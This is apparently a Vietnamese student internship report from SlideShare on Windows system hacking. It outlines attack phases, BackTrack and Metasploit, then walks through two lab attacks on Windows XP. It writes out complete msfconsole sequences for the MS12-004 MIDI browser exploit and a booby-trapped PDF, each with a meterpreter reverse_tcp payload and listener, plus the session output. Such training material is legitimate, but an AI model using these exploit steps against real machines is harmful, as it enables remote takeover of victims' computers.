SlideShare a Scribd company logo
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 1
MỞ ĐẦU
Theo thống kê của công ty Bkav, từ đầu năm 2013 đến nay, tại Việt Nam đã có
2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có
khoảng 300 website bị tấn công. Ông Vũ Ngọc Sơn, Phó chủ tịch phụ trách Nghiên cứu
phát triển củaBkav cho biết, các cơ quan doanh nghiệp bị tấn công gần như là đầy đủ, từ
ít nghiêm trọng đến nghiêm trọng và rất nghiêm trọng (nhằm đánh cắp các tài liệu mật)
và các mã độc này nhắm cả vào Bộ Công An, Bộ Quốc phòng, ngân hàng, các cơ quan
đơn vị nghiên cứu, các doanh nghiệp… Theo nhìn nhận của Bkav, đã có những chiến
dịch tấn công, phát tán mã độc có chủ đích vào Việt Nam. Trong đó, bản thân các vụ tấn
công trên mạng và các vụ xâm nhập hệ thống công nghệ thông tin là nhằm do thám, trục
lợi, phá hoại dữ liệu, ăn cắp tài sản, cạnh tranh không lành mạnh và một số vụ mất an
toàn thông tin số khác đang gia tăng ở mức báo động về số lượng, đa dạng về hình thức,
tinh vi hơn về công nghệ.
Trước tình hình đó, song songviệc ban hành chỉthị897/CT-TTg,Thủ Tướng chỉđạo
các Bộ, ngành, địa phương tăng cường giải pháp đảm bảo an toàn thông tin số. Thủ tướng
Chính phủ cũng đã nêu rõ, trong thời gian qua, tình hình mất an toàn thông tin số ở nước
ta diễn biến phức tạp, xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến việc ứng dụng
công nghệ thông tin phục vụ phát triển kinh tế - xã hội và đảm bảo quốc phòng, an ninh.
Bài báo cáo này sẽ giới thiệu tổng quát về các phương pháp mà Hacker sử
dụngđểtấncôngxâmnhậpvàkhaithácvàocácphiểnbảnhệđiềuhành Windows, hệ điều hành
phổ biến nhất hiện nay tại Việt Nam, từ đó giúp chúng ta nắm rõ cách thức mà Hacker sử
dụng và đưa ra các giải pháp giúp cho mỗi người dùng được an toàn thông tin, bảo mật
trong thời đại Internet ngày nay.
Hoàng Thanh Quý.
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 2
LỜI CẢM ƠN
Để thực hiện và hoàn thànhđề tài này,trước hết tôi xin cảm ơn đến các thầy Võ Đỗ
Thắng, giảng viên hướng dẫn sinh viên thực tập tại Trung tâm đào tạo quản trị mạngvà an
ninh mạngquốc tế ATHENA, đã tận tình chỉ bảo trong thời gian vừa qua.
Tôicũngxin gửi lờicám ơn đếncác anh chị, bạn bè đã truyền đạt kinh nghiệm và tạo
điều kiện cho tôi hoàn thành đề tài này.
Trong quá trình thực hiệnđề tàikhông thểkhông có nhữngsai sót, mong thầycô tại
trung tâm ATHENA và các bạn thẳng thắn góp ý đề tôi rútkinh nghiệm trong các công
trình tìm hiểu, phát triển sau này.
Hoàng Thanh Quý.
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 3
PHẦN 1: GIỚI THIỆU
1.1 System Hacking và Tình hình an ninh mạng Việt Nam
System hacking bao gồm những kỹ thuật lấy username, password dựa vào phần
mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ điều hành
Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những log
file hệ thống. Một khi đã xâm nhập vào hệ thống, Hacker có thể thực hiện mọi thứ trên
máy tính đó, gây ra những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ chức.
1.2 Các lỗ hổng thường khai thác trong hệ điều hành Windows
Phần mềm máy tính ngày nay vô cùng phức tạp, bao gồm hàng ngàn dòng mã.
Phần mềm được viết ra bởi con người, nên cũng chẳng có gì lạ khi trong đó có chứa
những lỗi lập trình, được biết đến với tên gọi lỗ hổng. Những lỗ hổng này được Hacker
sử dụng để xâm nhập vào hệ thống, cũng như được tác giả của các đọan mã độc dùng để
khởi động chương trình của họ một cách tự động trên máy tính của bạn.
Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điều hành,
các Web Server hay các phần mềm khác, ... Và các hãng sản xuất luôn cập nhật các lỗ
hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các phiên bản trước.
Do đó, người sử dụng phải luôn cập nhật thông tin và nâng cấp phiên bản cũ mà mình
đang sử dụng nếu không các Hacker sẽ lợi dụng điều này để tấn công vào hệ thống.
Thông thường, các forum của các hãng nổi tiếng luôn cập nhật các lỗ hổng bảo mật và
việc khai thác các lỗ hổng đó như thế nào thì tùy từng người.
Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới của hệ
điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn đang ngày càng
phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ điều hành của Microsoft.
Tội phạm mạng thường sử dụng các lỗ hổng trong các mã chương trình để truy
cập vào các dữ liệu và tài nguyên trên máy tính bị lỗi bảo mật. Các chương trình độc hại
được thiết kế đặc biệt để khai thác các lỗ hổng này, được gọi là kỹ thuật exploit, đang
ngày càng phổ biến nhanh chóng.
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 4
Những sản phẩm của Microsoft thường gặp phải các lỗ hổng bảo mật như HĐH
Windows,InternetExplorer,WindowsServer,MicrosoftExchangevà.NetFramework.
1.3 Quá trình tấn công vào một hệ thống
Trước tiên ta sẽ tìm hiểu tổng quát một quá trình tấn công hệ thống. Mục tiêu phía
trước của chúng ta là một hệ thống máy tính. Các bước để tấn công, đánh sập nó, có thể
được liệt kê như hình vẽ bên cạnh. Nó gồm 6 công đoạn như sau:
Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong hệ thống.
Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu ích, chính
xác hơn.
Crack: Công đoạn này có lẽ hấp dẫn nhiềuHackernhất. Bước này yêu cầu chúng ta
bẽ khóa mật khẩu đăng nhậpcủauser.Hoặcbằngmộtcáchnàokhác,mụctiêu phải đạt
tới là quyền truy cập vào hệ thống.
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 5
Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ user binh
thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn công.
Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị trước
malware, keylogger, rootkit…để chạy nó trên máy tính tấn công.
Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải
được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt.
Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tin có liên
quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không khả
năng bạn bị phát hiện là kẻ đột nhập là rất cao.
Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá
trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ thuật như
Footprinting,Socialengineering,Enumeration,GoogleHacking…đãđượcápdụng cho mục
đích truy tìm thông tin.
Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá trình tấn
cônghệthốngthậtsự.Taphảitiếnhànhnhữngkỹthuậtkhácnhauđểlàmsaovào được trong hệ
thống đó, thực hiện những việc mà mình mong muốn, như xóa dữ liệu, chạy chương trình
trojan, keylogger…
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 6
PHẦN 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG
MẠNG LAN
2.1 Hệ điều hành Backtrack 5 R3
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử
nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux
về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiênbảnhiệntại
củanó(5),BacktrackđượcdựatrênphiênbảnphânphốiLinux Ubuntu 11.10.
Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác nhau.
Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas M.(www.slax.org)).
Backtrack liên tục cập nhật các công cụ, drivers,...Hiện tại Backtrack có trên 300 công cụ
phục vụ cho việc nghiên cứu bảo mật. Backtrack là sự kết hợp giữa 2 bộ công cụ kiểm
thử bảo mật rất nổi tiếng là Whax và Auditor.
Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm
thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack 5 có thể được
phân loại như sau:
Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có
được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, trang
web, máy chủ mail, và như vậy. Thông tin này được th u thập từ các thông tin có
sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu.
Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra các
host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng
làm portscanning.
Vulnerabilityidentification:Trongthểloạinày,chúngtacóthểtìmthấycác công cụ để
quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ
để thực hiện và phân tích Server Message Block (SMB) vàSimple Network
Management Protocol (SNMP).
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 7
Web application analysis: loại này chứa các công cụ có thể được sử dụng trong
theo dõi, giám sát các ứng dụng web.
Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần
số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể loại này.
Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ
hổng tìm thấy trong các máy tính mục tiêu.
Privilegeescalation:Saukhikhaitháccáclỗhổngvàđượctruycậpvàocác máy tính mục
tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền
của chúng ta cho các đặc quyền cao nhất.
Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy
trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được
nhữngđặc quyềncaonhấttrướckhicácchúngtacóthểcàiđặtcôngcụđểduytrì quyền truy
cập.
Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ
trong thể loại này.
Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể
được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc
các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong
thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi
động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao
đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.
Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối
chương trình một hoặc tháo rời một tập tin thực thi.
Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtracklinux.org/downloads/
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 8
2.2 Phần mềm Metasploit
Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ
hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống phát hiện
tấncôngmạng.MetasploitFrameworklàmộtmôitrườngdùngđểkiểmtra,tấn côngvà khai thác
lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng
đốitượngPerl,vớinhữngcomponentsđượcviếtbằngC,assembler,vàPython. Metasploit có
thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Chúng ta cóthể
download chương trình tại www.metasploit.com.
Metasploit hỗ trợ nhiều giao diện với người dùng:
Consoleinterface:dùnglệnhmsfconsole.Msfconsoleinterfacesửdụngcác dòng lệnh
để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn.
Webinterface:dùngmsfweb,giaotiếpvớingườidùngthôngquagiaodiện Web.
Command line interface: dùng msfcli.
Metasploit Enviroment:
Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg, những
options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits.
TemporaryEnviroment:Đượcthựcthithôngqua2câulệnhsetvàunset, enviroment này
chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng
đếncácmoduleexploitkhácChúngcóthểlưulạienviromentmìnhđãcấu hình thông qua lệnh
save. Môi trường đó sẽ được lưu trong ./msf/config và sẽ được load trở lại khi user
interface được thực hiện.
Sử dụng Metasploit Framework:
a)Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có
hỗ trợ để khai thác
Show exploits: xem các module exploit mà framework có hỗ trợ.
Use exploit_name: chọn module exploit.
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 9
Info exploit_name: xem thông tin về module exploit.
Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các modul trên
www.metasploit.comhoặcqualệnhmsfupdatehoặc svnupdat/opt/metasploit/msf3/.
b)Cấu hình Module exploit đã chọn:
show options: Xác định những options nào cần cấu hình.
set : cấu hình cho những option của module đó.
Một vài module còn có những advanced options, chúng ta có thể xem bằng cách
gõ dòng lệnh show advanceds.
c)Verify những options vừa cấu hình:
check: kiểm tra xem những option đã được set chính xác chưa.
d)Lựa chọn target:
show targets: những target được cung cấp bởi module đó.
set: xác định target nào.
e)Lựa chọn payload:
show payloads: liệt kê ra những payload của module exploit hiện tại.
info payload_name: xem thông tin chi tiết về payload đó.
setpayloadpayload_name:xácđịnhpayloadmodulename.Saukhilựachọn payload
nào, dùng lệnh show options để xem những options của payload đó.
show advanced: xem những advanced options của payload đó.
g)Thực thi exploit:
exploit:lệnhdùngđểthựcthipayloadcode.Payloadsauđósẽcungcấpcho chúng ta
những thông tin về hệ thống được khai thác.
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 10
2.3 Sơ đồ tổng quan hệ thống mạng LAN
Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng
cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy tính
trongmạngLANcóthểchiasẻtàinguyênvớinhau,màđiểnhìnhlàchiasẻtập tin, máy in, máy
quét và một số thiết bị khác. Khi một máy tính ở trong mạng LAN, nó có thể sử dụng các
chương trình, phần mềm quét hệ thống mạng để biết được địa chỉ IP các host có trong
mạng.
Nmap(NetworkMapper)làmộttiệníchnguồnmởmiễnphíchopháthiện mạng và kiểm
toán an ninh. Nmap và Zenmap (Công cụ hỗ trợ đồ họa của nmap) được cài đặt sẵn trong
BackTrack, sử dụng các gói tin IP giúp xác định host nào có sẵn trên mạng,
cácdịchvụ(tênứngdụngvàphiênbản)màhostđóđangcungcấp,hệđiều
hànhgì(vàcácphiênbảnhệđiềuhành)màhọđangchạy,loạibộlọcgóitinhoặc tường lửa nào
đang sử dụng, và nhiều đặc điểm khác. Nmap chạy được trên tất cả các hệ điều hành, và
các gói nhị phân chính thức có sẵn cho Linux, Windows, và Mac OS X.
Sau khi xác định được các host có trong mạng, ta có thể sử dụng các công cụ quét
lỗi hệ thống để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai thác truy cập
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 11
vào hệ thống. Một trong số các công cụ quét lỗi này là Nessus, download tại địa chỉ
http://www.nessus.org/.
Mộtkhiđãxâmnhậpthànhcôngvàchiếmđượctoànquyềnđiềukhiểnhệ
thống,Hackercóthểthựchiệnmọiviệctrênmáynạnnhânnhưdown/uploadfiles,
thayđổicấutrúchệthống,thựcthichươngtrình,đánhcắpmậtkhẩu,càitrojan/ backdoor, …
2.4 Xâm nhập và khai thác Windows XP
2.4.1 Lỗ hổng sử dụng: Ms12_004
Khởi động msfconsole tử cửa sổ terminal của BackTrack.
Khai báo lỗ hổng sử dụng và thiết đặt options:
Search ms12_004
use exploit/windows/browser/ms12_004_midi
show options
set SRVHOST 192.168.159.128
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.159.128
exploit
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 12
BackTrack sẽ tạo ra một link chứa mã độc (http ://192.168.159.128:4444). Chỉ cần
nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc sang máy nạn
nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn nhân đó.
Tiến hành khai thác máy nạn nhân có IP: 192.168.159.130 port 1078.
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 13
sessions
sessions –i 1
getuid
sysinfo
Hacked: khai thác thành công lỗi ms12_004 trên winXP SP2.
Nạn nhân :
Computer: QUYDONGN – 3B5D9F.
Os: Windows XP (Build 2600. Service Pack 2).
Architecture: x86.
Systemlanguage: en US.
Meterpreter: x86/win32.
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 14
2.4.2 Lỗ hổng sử dụng thông qua file PDF
Khởi động msfconsole tử cửa sổ terminal của BackTrack.
Khai báo lỗ hổng sử dụng và thiết đặt options:
Search nojs
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
show options
set FILENAME hack.pdf
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.136.128
set LPORT 4444
exlpoit
Backtrack thông báo đã tạo thành công 1 file hack.pdf nằm trong thư mục
/root/ms4/local/.
use multi/hanler
set payload windows/meterpreter/reverse_tcp
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 15
set LHOST 192.168.136.128
exploit
Backtrack thông báo đã sẵn sàng cho việc tấn công. Chúng ta sẽ gửi file hack.pdf
vừa tạo ra trước đó cho nạn nhân. Nếu nạn nhân mở file hack.pdf thì Backtrack sẽ gửi các
mã độc sang máy nạn nhân để lấy thông tin và chiếm quyền điều khiển máy nạn nhân.
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 16
Backtrack thông báo có 1 sessions đã mở file hack.pdf là máy có địa chỉ IP
192.168.136.128 port 1037 và đã gửi 752128 file mã độc sang máy nạn nhân. Tiếp theo
chúng ta sẽ kiểm tra thông tin máy nạn nhân.
sysinfo
ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING
SVTH: HOÀNG THANH QUÝ Trang 17
Hacked: khai thác thành công thông qua lỗi file PDF trên winXP SP2
Nạn nhân:
Computer: HUUANHH – 9091FB1.
Os: Windows XP (Build 2600. Service Pack 2).
Architecture: x86.
Systemlanguage: en US.
Meterpreter: x86/win32.

More Related Content

What's hot

Tuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingTuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingv7q3t
 
Chương 8_Bảo mật và an ninh mạng
Chương 8_Bảo mật và an ninh mạngChương 8_Bảo mật và an ninh mạng
Chương 8_Bảo mật và an ninh mạng
Hoa Le
 
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTBài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
MasterCode.vn
 
Chương 6 Bảo mật - Giáo trình FPT
Chương 6 Bảo mật - Giáo trình FPTChương 6 Bảo mật - Giáo trình FPT
Chương 6 Bảo mật - Giáo trình FPT
MasterCode.vn
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hacking
Huynh Khang
 
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
MasterCode.vn
 
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
MasterCode.vn
 
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Loc Tran
 
Canh bao hinh thuc lay nhiem ransomware
Canh bao hinh thuc lay nhiem ransomwareCanh bao hinh thuc lay nhiem ransomware
Canh bao hinh thuc lay nhiem ransomware
thanglx
 
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPT
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPTBài 7: Xác thực và quản lý tài khoản - Giáo trình FPT
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPT
MasterCode.vn
 
Thiết lập access rule trên TMG 2010
Thiết lập access rule trên TMG 2010Thiết lập access rule trên TMG 2010
Thiết lập access rule trên TMG 2010
Phan Khanh Toan
 
System hacking_Athena
System hacking_AthenaSystem hacking_Athena
System hacking_Athena
Huynh Khang
 
Báo cáo thực tập - Đàm Văn Sáng
Báo cáo thực tập  - Đàm Văn SángBáo cáo thực tập  - Đàm Văn Sáng
Báo cáo thực tập - Đàm Văn Sáng
Đàm Văn Sáng
 
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...
Vu Hung Nguyen
 
Đề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạng
Đề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạngĐề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạng
Đề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạng
Dịch vụ viết bài trọn gói ZALO: 0909232620
 
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPTBài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
MasterCode.vn
 
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTBài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
MasterCode.vn
 

What's hot (19)

Tuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingTuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hacking
 
Chương 8_Bảo mật và an ninh mạng
Chương 8_Bảo mật và an ninh mạngChương 8_Bảo mật và an ninh mạng
Chương 8_Bảo mật và an ninh mạng
 
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPTBài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
Bài 4: Bảo mật máy chủ, ứng dụng, dữ liệu và mạng - Giáo trình FPT
 
Chương 6 Bảo mật - Giáo trình FPT
Chương 6 Bảo mật - Giáo trình FPTChương 6 Bảo mật - Giáo trình FPT
Chương 6 Bảo mật - Giáo trình FPT
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hacking
 
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
Bài 2: Phần mềm độc hại và các dạng tấn công sử dụng kỹ nghệ xã hội - Giáo tr...
 
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
Bài 3: Tấn công vào ứng dụng và mạng, đánh giá khả năng thiệt hại và làm giảm...
 
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
 
Canh bao hinh thuc lay nhiem ransomware
Canh bao hinh thuc lay nhiem ransomwareCanh bao hinh thuc lay nhiem ransomware
Canh bao hinh thuc lay nhiem ransomware
 
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPT
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPTBài 7: Xác thực và quản lý tài khoản - Giáo trình FPT
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPT
 
E Lib&Learning
E Lib&LearningE Lib&Learning
E Lib&Learning
 
Thiết lập access rule trên TMG 2010
Thiết lập access rule trên TMG 2010Thiết lập access rule trên TMG 2010
Thiết lập access rule trên TMG 2010
 
System hacking_Athena
System hacking_AthenaSystem hacking_Athena
System hacking_Athena
 
Báo cáo thực tập - Đàm Văn Sáng
Báo cáo thực tập  - Đàm Văn SángBáo cáo thực tập  - Đàm Văn Sáng
Báo cáo thực tập - Đàm Văn Sáng
 
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...
MỘT SỐ NGUY CƠ ĐỐI VỚI AN TOÀN, BẢO MẬT THÔNG TIN TRÊN MẠNG CNTT CƠ QUAN ĐẢNG...
 
Đề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạng
Đề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạngĐề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạng
Đề tài: Hệ thống phát hiện cảnh báo nguy cơ tấn công mạng
 
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPTBài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
Bài 6: Kiến thức cơ sở về điều khiển truy cập - Giáo trình FPT
 
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPTBài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
Bài 1: GIỚI THIỆU VỀ BẢO MẬT - Giáo trình FPT
 
Ch19
Ch19Ch19
Ch19
 

Viewers also liked

Báo cáo thực tập lần 1
Báo cáo thực tập lần 1Báo cáo thực tập lần 1
Báo cáo thực tập lần 1Nhí Minh
 
Hướng dẫn báo cáo thực tập trường học viện tài chính
Hướng dẫn báo cáo thực tập trường học viện tài chínhHướng dẫn báo cáo thực tập trường học viện tài chính
Hướng dẫn báo cáo thực tập trường học viện tài chính
Dương Hà
 
Báo cáo thực tập về công ty TNHH Thương Mại và Dịch Vụ Đức Thịnh
Báo cáo thực tập về công ty TNHH Thương Mại và Dịch Vụ Đức ThịnhBáo cáo thực tập về công ty TNHH Thương Mại và Dịch Vụ Đức Thịnh
Báo cáo thực tập về công ty TNHH Thương Mại và Dịch Vụ Đức ThịnhTiểu Yêu
 
Báo cáo thực tập tài chính doanh nghiệp
Báo cáo thực tập tài chính doanh nghiệpBáo cáo thực tập tài chính doanh nghiệp
Báo cáo thực tập tài chính doanh nghiệp
Học kế toán thực tế
 
